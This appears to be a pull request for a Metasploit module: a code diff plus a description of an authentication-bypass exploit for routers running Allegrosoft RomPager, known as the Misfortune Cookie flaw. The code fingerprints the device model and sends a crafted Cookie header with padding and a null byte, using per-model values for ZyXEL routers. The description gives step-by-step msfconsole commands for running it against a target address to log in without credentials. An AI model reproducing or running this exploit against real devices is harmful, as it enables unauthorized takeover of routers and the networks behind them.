+        :'P-660R-T3 v3'=> #This value works on devices with model P-660R-T3 v3 not P-660R-T3 v3s
+            {:name=>'ZyXEL', :model=>'P-660R-T3', :values=>[
+                [107369567, 21]
+            ]},
+        :'P-660RU-T3 v2'=> #Couldn't verify this
+            {:name=>'ZyXEL', :model=>'P-660R-T3', :values=>[
+                [107369567, 21]
+            ]},
+    }
   end
 
-  def auxiliary_commands
-    { "devices" => "List known vulnerable devices" }
-  end
 
-  # Command for listing all devivces with known values, for bypass to work
-  def cmd_devices(*args)
-    tbl =	Msf::Ui::Console::Table.new(
-        Msf::Ui::Console::Table::Style::Default,
-        'Header'  => "List of vulnerable devices",
-        'Prefix'  => "\n",
-        'Postfix' => "\n",
-        'Columns' =>
-            [
-                'ID',
-                'Name',
-                'Model',
-                'Firmware',
-                'Number',
-                'Offset'
-            ])
-    counter = 0
-    for device in devices_list
-      tbl << [counter, device[:name], device[:model], device[:fw], device[:number], device[:offset] ]
-      counter += 1
+  def check_response_fingerprint(res, fallback_status)
+    fp = http_fingerprint(response: res)
+    vprint_status("Fingerprint: #{fp}")
+    if /realm="(?<model>.+)"/ =~ fp
+      return model
     end
-    print tbl.to_s
+    fallback_status
   end
 
   def run
-    cookie = ''
-    begin
-      cookie_number = devices_list[datastore['DEVICE']][:number].to_s
-      cookie_offset = devices_list[datastore['DEVICE']][:offset]
-      cookie = 'C' + cookie_number + '=' + 'B' * cookie_offset + "\x00"
-    rescue
-      print_error('Device number is out of range, please run devices to see list of vulnerable devices')
-    end
-    print_status('Device name: ' + devices_list[datastore['DEVICE']][:name])
-    print_status('Device model: ' + devices_list[datastore['DEVICE']][:model])
-    print_status('Device firmware: ' + devices_list[datastore['DEVICE']][:fw])
     res = send_request_raw(
         'uri' => normalize_uri(target_uri.path.to_s),
         'method' => 'GET',
-        'headers' => headers.merge('Cookie' => cookie)
     )
-    if res != nil and res.code <= 302 # This may give wrong results if run against non rom-pager devices
-      print_good('Exploit sent, please check host, authentication should be disabled')
+    model = check_response_fingerprint(res, Exploit::CheckCode::Detected)
+    if model != Exploit::CheckCode::Detected
+      devices = devices_list[model.to_sym]
+      if devices != nil
+        print_good("Detected device:#{devices[:name]} #{devices[:model]}")
+        devices[:values].each { |value|
+          cookie = "C#{value[0]}=#{'B'*value[1]}\x00"
+          res = send_request_raw(
+              'uri' => normalize_uri(target_uri.path.to_s),
+              'method' => 'GET',
+              'headers' => headers.merge('Cookie' => cookie)
+          )
+          if res != nil and res.code <= 302
+            print_good('Good response, please check host, authentication should be disabled')
+            break
+          else
+            print_error('Bad response')
+          end
+        }
+      else
+        print_error("No matching values for fingerprint #{model}")
+      end
     else
-      print_error('Exploit failed')
+      print_error('Unknown device')
     end
   end
 end


### PR DESCRIPTION
New module for authentication bypass on devices running Allegrosoft RomPager vulnerable to misfortune cookie vulnerability.

I don't know how to do reliable fingerprinting of vulnerable devices, so user has to pick the right device from list. I implemented the `device` command to print table with vulnerable devices and known values used for exploitation. 

My first module so tell me if something is not according to the guidelines.

## Verification

Run against one of devices with firmware listed in docs

- Start msfconsole
- Do: ```use auxiliary/admin/http/allegro_rompager_auth_bypass```
- Do: ```set rhost <ip>```
- Do: ```set rport <port>```
- Do: ```set device <device-id>```
- Do: ```run```
- You should be able to login into the device without authentication

